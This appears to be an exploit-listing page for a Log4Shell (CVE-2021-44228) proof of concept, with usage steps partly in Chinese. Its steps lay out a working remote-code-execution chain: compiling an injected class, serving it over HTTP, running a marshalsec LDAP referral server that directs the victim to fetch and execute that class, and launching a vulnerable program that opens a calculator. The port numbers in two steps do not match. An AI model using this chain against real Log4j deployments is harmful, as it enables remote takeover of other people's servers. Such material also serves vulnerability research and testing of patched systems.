Exploit for Deserialization of Untrusted Data in Apache Log4J CVE-2021-44228

## https://sploitus.com/exploit?id=5C116D88-E2CC-5BC3-9A71-3174292E227D
# CVE-2021-44228(Apache Log4j Remote Code Execution）
Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0

[Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)](https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592)

### Usage:

1. 下载该项目，编译InjectClazz.java

```shell
# download
git clone http://github.com/lonecloud/CVE-2021-44228-Apache-Log4j
cd CVE-2021-44228-Apache-Log4j
javac InjectClazz.java

```

2. 在InjectClazz所在目录下启动web服务器
```shell
# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888
# 
```

3. 下载LDAP 服务器
```shell script
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8088/#InjectClazz" 1389
```
4. 运行项目
```
cd CCVE-2021-44228-Apache-Log4j
mvn clean package
java -cp target/CVE-2021-44228-Apache-Log4j-1.0-SNAPSHOT-all.jar Log4jAceMain


# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8088/InjectClazz.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /InjectClazz.class HTTP/1.1" 200 -

```